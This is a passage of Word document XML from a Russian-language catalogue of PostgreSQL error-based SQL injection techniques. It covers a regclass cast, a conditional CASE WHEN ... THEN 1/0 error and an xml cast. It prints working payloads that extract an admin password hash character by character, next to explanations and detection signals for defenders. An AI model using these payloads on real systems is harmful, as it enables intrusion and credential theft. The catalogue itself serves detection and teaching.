        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> применён к выражению с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в легитимных контекстах имя таблицы либо литерал, либо берётся из metadata-таблицы как готовая строка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A373EC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Префикс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'x_' ||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'invalid_' ||</w:t>
      </w:r>
      <w:r>
        <w:t>, или любой другой маркер невалидности перед подзапросом — индикатор намеренного провала резолва.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046EEF0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Аргумент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — подзапрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... FROM users/products/orders)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к user-data таблицам, а не к metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED541AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46456B08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.1, 3.2.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027DBEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet; HackTricks: PostgreSQL injection — Error based; PostgreSQL Documentation: Object Identifier Types — regclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D4B59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.3 Условная ошибка через `CASE WHEN ... THEN 1/0`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B061FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN cond THEN 1/0 ELSE 1 END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — гибрид error-based и boolean-blind. При истинном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cond</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>division by zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (HTTP 500), при ложном — выражение возвращает 1 и запрос завершается успешно (HTTP 200). Атакующий читает данные побитово, превращая каждое условие в один HTTP-запрос.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABD36B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1, но канал работает даже без проброса текста ошибки наружу — достаточно различать HTTP 500 и HTTP 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA85A9"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1546A3C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Проверка стартового символа пароля:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205B4AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(SELECT CASE WHEN (SELECT password_hash FROM users WHERE login='admin') LIKE 'a%' THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF13135" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9885C"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(SELECT password_hash FROM users WHERE login='admin') LIKE 'a%' THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0FD8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Результаты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BD2AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если хеш начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'a'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ветка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вычисляется → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: division by zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → HTTP 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0E297D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Иначе: подзапрос возвращает 1, основной запрос превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и отрабатывает успешно → HTTP 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A76CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Извлечение по одному символу через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii(substring(...))</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C80E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) = 36 THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38C228"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ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) = 36 THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D3587" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Бинарный поиск ускоряет: вместо 128 запросов на символ хватает 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B29F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий извлекает данные побитово или посимвольно через различение кодов ответа. Канал медленный, но устойчивый: работает там, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не работают из-за того, что приложение глотает текст ошибки и возвращает обобщённое 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D061C8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Деление целочисленных типов в PG при делителе 0 вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ereport(ERROR, errcode(ERRCODE_DIVISION_BY_ZERO), errmsg("division by zero"))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int4div()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG — short-circuit: ветка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ELSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не вычисляется, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cond</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> истинно. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывает строго при истинном условии. Это даёт чистый бинарный канал поверх любой инъекции, где наблюдаем хотя бы факт ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E827163" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Канал доставки текста ошибки не требуется — достаточно различимости HTTP-status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D44E245" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Деление в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречается, когда программисты защищаются от деления на ноль через явный guard: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN denominator = 0 THEN NULL ELSE numerator/denominator END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это обратная конструкция — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN &lt;безопасное&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ELSE &lt;деление&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A93BEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C91D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или эквивалентные конструкции — деление на ноль никогда не пишут намеренно как «успешный» путь.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122EB0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN cond THEN &lt;ошибка&gt; ELSE &lt;норма&gt; END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или скалярном контексте, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cond</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — подзапрос к user-data таблице.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A00951"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pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: одна и та же форма запроса с разными литералами в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и разными константами для сравнения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii(...) = K</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D926016" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Корреляция HTTP 500 с одного клиента и одинаковым URL, отличающимся только query string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D08FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE489E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3, 3.4, 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4C185" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Conditional errors; HackTricks: PostgreSQL injection; PostgreSQL Documentation: Conditional Expressions — CASE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940E959" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2.4 XML-парсер: `::xml`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A44F9F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG-тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет собственный парсер (libxml2). Cast к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от невалидного XML-фрагмента возвращает ошибку, в которую попадает часть исходного текста. Используется реже, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что менее предсказуем (зависит от libxml2-сборки), и потому что требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--with-libxml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при компиляции сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53362B4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028407A"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033E6CCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через каст к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0BE35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ('&lt;' || (SELECT login FROM users LIMIT 1) || '&gt;')::xml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDA08B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34C230"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('&lt;' || (SELECT login FROM users LIMIT 1) || '&gt;')::xml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A83E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
